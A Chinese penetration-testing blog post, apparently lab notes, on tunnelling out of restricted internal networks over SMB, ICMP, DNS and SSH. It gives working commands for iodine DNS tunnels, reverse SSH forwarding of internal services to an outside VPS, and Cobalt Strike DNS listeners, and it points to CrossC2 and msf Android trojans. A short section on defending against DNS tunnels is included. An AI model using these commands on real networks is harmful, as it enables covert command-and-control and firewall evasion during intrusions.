【内网安全】隧道技术SSHDNSICMPSMB上线通讯LinuxMac
文章目录
- SMB隧道&通讯&上线
- ICMP隧道&通讯&上线
- DNS隧道&通讯&上线
- 1、上线环境:内网主机只出网DNS协议数据,解决上线
- 2、通讯环境:
- windows 演示
- linux演示
- SSH隧道&通讯
- 防御DNS隧道攻击的方法
- 控制上线-插件-Linux&Mac&IOS&Android
- 参考:
CS不支持linux主机上线
这里禁用了所有tcp端口,依旧可以ping通,以及dns解析成功
SMB隧道&通讯&上线
判断:445通讯
通过端口扫描是否开放445端口进行判断
上线:借助通讯后绑定上线 详见往期文章
通讯:直接SMB协议通讯即可
ICMP隧道&通讯&上线
判断:ping命令
能ping通说明可以使用icmp隧道
上线:见往期文章
通讯:其他项目(icmpsh icmptunnel)
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel
DNS隧道&通讯&上线
判断:windows:nslookup linux:dig
1、上线环境:内网主机只出网DNS协议数据,解决上线
-域名申请及配置
-监听器创建及配置
-后门绑定监听器及生成
CS建立DNS隧道上线
mode dns-txt
sleep 0
2、通讯环境:
有些鸡肋
内网主机只出网DNS协议数据,解决通讯
判断出网:nslookup www.baidu.com
项目工具:https://github.com/yarrick/iodine
iodine/ˈaɪədaɪn/单词的意思就是碘 原子序数为 53,53 也是 DNS 服务对应的端口号
安装
yum install iodine #centos
apt-get intall iodine #ubuntu
-服务器:设置密码xiaodi并创建虚拟IP及绑定域名指向 这里演示linux服务端,windows服务端下载地址 https://code.kryo.se/iodine/
iodined -f -c -P whgojp 192.168.0.1 ns1.whgojp.top -DD
sudo iodined -f -c -P whgojp 192.168.0.1 ns1.whgojp.top -DD
-f 在前台运行
-c 不检查传入请求的客户端 IP 地址
-P 客户端与服务端之间的连接密码
-D 调试级别,-D 表示第一级,-DD 表示第二级,依此类推
192.168.0.1 是自己自定义的局域网虚拟 IP 地址。
设置密码whgojp并创建虚拟IP及绑定域名指向
-客户端:连接密码whgojp并绑定域名指向
windows 演示
iodine -f -M 200 -P whgojp ns1.whgojp.top
直接放到靶机上执行会报错,windows客户端可以直接使用编译好的windows版本,同时需要安装TAP网卡驱动程序。也可以下载OpenVPN,安装时只选择TAP Virtual Ethernet Adapter,安装后服务器上就会多出一块“TAP-Wndows ADApter V9”的网卡
都能在对方电脑上安装程序了,还要这样大费周折
双方都新增了一个网卡(dns、TAP-9),从而建立了通道
ping不通是因为靶机上有防火墙
windows平台iodine建立DNS隧道连接
linux演示
未开防火墙
-尝试通讯尝试连接:
ssh kali@192.168.0.2
这里我尝试ssh连接,但是立即命令中断,可能是DNS配置问题
SSH隧道&通讯
判断:ssh连接
1、上线:
由于CS无SSH协议监听器配置,无法上线
2、通讯:
由于SSH协议存在于Linux系统,跳板机必须Linux
iptables -F /* 清除所有规则 /
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /允许包从22端口进入/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /允许从22端口进入的包返回/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT / 域名解析端口,一般不开 /
iptables -A INPUT -p udp --sport 53 -j ACCEPT / 域名解析端口,一般不开 /
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /允许本机访问本机/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /允许所有IP访问80端口/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /保存配置/
iptables -L / 显示iptables列表 */
开启ssh协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
本地:入站封
将本地访问 10.10.10.132的流量转发至公网vps 1234端口上
ssh -CfNg -R 1122:10.10.10.132:8080 root@47.94.130.xx
curl http://127.0.0.1:1122
SSH隧道流量转发远程vps-信息探针
远程:出站封
将本地访问10.10.10.132的流量转发至本地的1234的端口上
ssh -CfNg -L 1234:10.10.10.132:8080 root@10.10.10.146
curl http://127.0.0.1:1234
同上输入146密码,访问本地(146)1234端口,
防御DNS隧道攻击的方法
禁止网络中任何人向外部服务器发送DNS请求,只允许与受信任的DNS服务器通信。
虽然没有人会将TXT解析请求发送给DNS服务器,但是邮件服务器/网关会这样做,因此,可以将邮件服务器/网关列入白名单并阻止传入和传出流量中的TXT请求。
跟踪用户的DNS查询次数,如果达到阈值,就生成相应的报告
控制上线-插件-Linux&Mac&IOS&Android
项目:https://github.com/gloxec/CrossC2
面向Linux Mac IOS Android系统上线支持
1、插件使用
2、命令使用
使用参考:
https://gloxec.github.io/CrossC2/zh_cn/
1、下载对应版本加载器和CNA插件
2、上传加载器文件和本地加载CNA插件
3、修改CNA插件配置路径及上传Key文件
4、使用命令或插件绑定HTTPS监听器生成
使用CS4.7版本没有搭建成功
待续
安卓apk木马可以使用msf生成,不过只能在模拟器中成功上线
参考:
https://zhuanlan.zhihu.com/p/379021936
https://www.cnblogs.com/micr067/p/12263337.html
【内网安全】隧道技术SSHDNSICMPSMB上线通讯LinuxMac相关推荐
- 【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议
前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...
- 内网安全-隧道技术-防火墙限制协议绕过-文件传输
隧道技术: 一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装. 传输和解包在内的全过程.使用隧道传递的数据(或负载)可以是不同协议的数据帧或包. 封装: 隧道协议将这些其他协议的数据 ...
- 内网安全——代理技术Socks5网络通讯控制上线
目录 (一)前置知识 0x01 单机--防火墙之限制出入站 常见主机配置不出网的方式
- 【引用】内网安全数据保密技术分析与比较
内网安全数据保密技术分析与比较 邹翔① 王志海②,李志涛② (①公安部第三研究所上海 200031: ②北京明朝万达科技有限公司,北京 100000) [摘要]本文通过对目前主要的内网安全数据保密关键 ...
- 通过路由器搭建内网穿透隧道
通过路由器搭建内网穿透隧道 将本台计算机设置为一台服务器 控制面板中选择程序和功能,启用或关闭WINDOWS功能 选择左边启用或关闭 Windows 功能,勾选 Internet Informatio ...
- 【全过程记录】将windows电脑连接到ipad的rd client远程桌面,通过路由器搭建内网穿透隧道
caiyi 2021/10/03 通过路由器搭建内网穿透隧道 将本台计算机设置为一台服务器 文章目录 一.找到内网ip 二.找到端口号 三.在ipad上同一局域网下连接 四.在不同局域网下连接 五.突 ...
- 【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)
目录 一.准备 1.意义: 2.项目: 二.内网穿透 1.简介: 三.Ngrok(入门上线) 1.简述: 2.Ngrok入门上线(国版二开) 3.相关工具: 2.Ngrok入门上线(美版) 一.准备 ...
- 【内网安全-隧道搭建】内网穿透_Frp上线、测试
目录 Frp(简易上线) 1.简述: 2.工具: 3.使用: 1.准备: 2.服务端(公网): 2.客户端(内网): 3.测试方法: 4.生成后门木马监听: Frp(简易上线) 1.简述: 1)Frp ...
- 内网穿透的技术解决方案
1.NAT地址转换,解决的是IPV4地址不够用的问题: [硬核]公网访问?内网穿透!零经验上手!_哔哩哔哩_bilibili 2. 公网向内网发送数据的问题如何解决? 设置端口转发 3.多层NAT,解 ...
最新文章
- python生日贺卡制作以及细节问题的解决最后把python项目发布为exe可执行程序过程
- [导入]ASP.NET MVC的WebSite模式(with mvc membership)
- java记录目录树_Java记录
- 洛谷P1605:迷宫(DFS)
- python输入数字是什么类型的游戏_“数字炸弹”——一个练习Python基础知识的小游戏...
- 简单系统U盘制作 / 安装系统
- 第十周 项目一(4)哈夫曼编码的算法验证
- 邮件合并的逆向应用,从多个Word文档中取值到Excel中
- 【锁屏】 Ubuntu20.04 锁屏快捷键无反应的解决方法
- SANGFOR SCSA——协议基础
- svg文件上传公众号生成微信链接
- 26个数据分析案例——第二站:基于Hive的民航客户价值分析
- 微信小程序点击弹出输入框
- js之for in循环遍历对象(包括输出value值为什么是obj[k]而不是obj.k)
- 愉快复习马克思主义与当代
- 智慧城市篇 | 数字孪生智慧排水管网管理平台
- 我爱赚钱吧:学生都可以做的兼职工作
- android手机blhx素材提取
- 猫的计算机相关的网络语言,辟谣:猫咪的语言是喵?教你读懂“猫言猫语”,让你明白猫的内心...
- 【QtScrcpy】开源的投屏控制软件 - 安利